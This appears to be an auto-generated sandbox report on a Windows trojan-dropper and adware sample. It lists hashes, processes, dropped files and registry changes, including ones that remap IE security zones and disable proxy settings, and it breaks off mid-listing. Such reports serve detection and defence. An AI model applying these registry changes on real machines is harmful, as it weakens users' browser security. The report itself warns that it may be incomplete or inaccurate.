Gen.Variant.Adware.MPlug.51_52eea08e05

by malwarelabrobot on July 2nd, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjapvx (Kaspersky), Gen:Variant.Adware.MPlug.51 (B) (Emsisoft), Gen:Variant.Adware.MPlug.51 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 52eea08e054915129f2638d8012a38f6
SHA1: 2f798b0d3b656556e4d8932e7d0e2251ae541429
SHA256: 1c12146ea5115bb93a53344ebbdbe69ef42eff99e6e97c7eb39f29786d1c122a
SSDeep: 6144:HOMWpa2kA0PIfIyF7D1eUuKg6EizR3iT7:HloX8IfIW1eUh9ESsP
Size: 234496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-10-25 08:28:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper: a Trojan program intended for stealthy installation of other malware on the user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164

The Trojan injects its code into the following process(es):

rundll32.exe:1016

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
%WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
%Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1.ini (0 bytes)
%Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\8.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\6_2_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_2.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\4_1.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7_1_1.ini (0 bytes)

The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca (0 bytes)
%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3b805d70 (0 bytes)

The process %original file name%.exe:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2 (0 bytes)
%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0284a4af (0 bytes)

The process %original file name%.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
%Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
%Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0903733f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1829a50e (0 bytes)

The process %original file name%.exe:440 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe (3572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1993275e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2e71167f (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca (0 bytes)

The process NybbleCrawler.xyz.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (0 bytes)

Registry activity

The process %original file name%.exe:1304 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\79458114e3582eab]
"(Default)" = "inFHyxdfrqw4GcBCDWIpJp8qt5Hd57Gs5m8wkosDKDXTr426U5La6BI6Dq7kK2DlONq2NazNPHYy9pelh2ZT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\alpha_installer]
"rc" = "1"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\alpha_installer]
"fi" = "0"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\alpha_installer]
"du" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\alpha_installer]
"cr" = "13080200161088"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 EB 36 33 B2 53 8D 6A DF 46 E6 1E 29 46 1D 87"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE security zone settings to map all local web nodes that have no dots in their names and are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"
"NoRepair" = "1"
"ProductName" = "bestadblocker"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "bestadblocker"
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
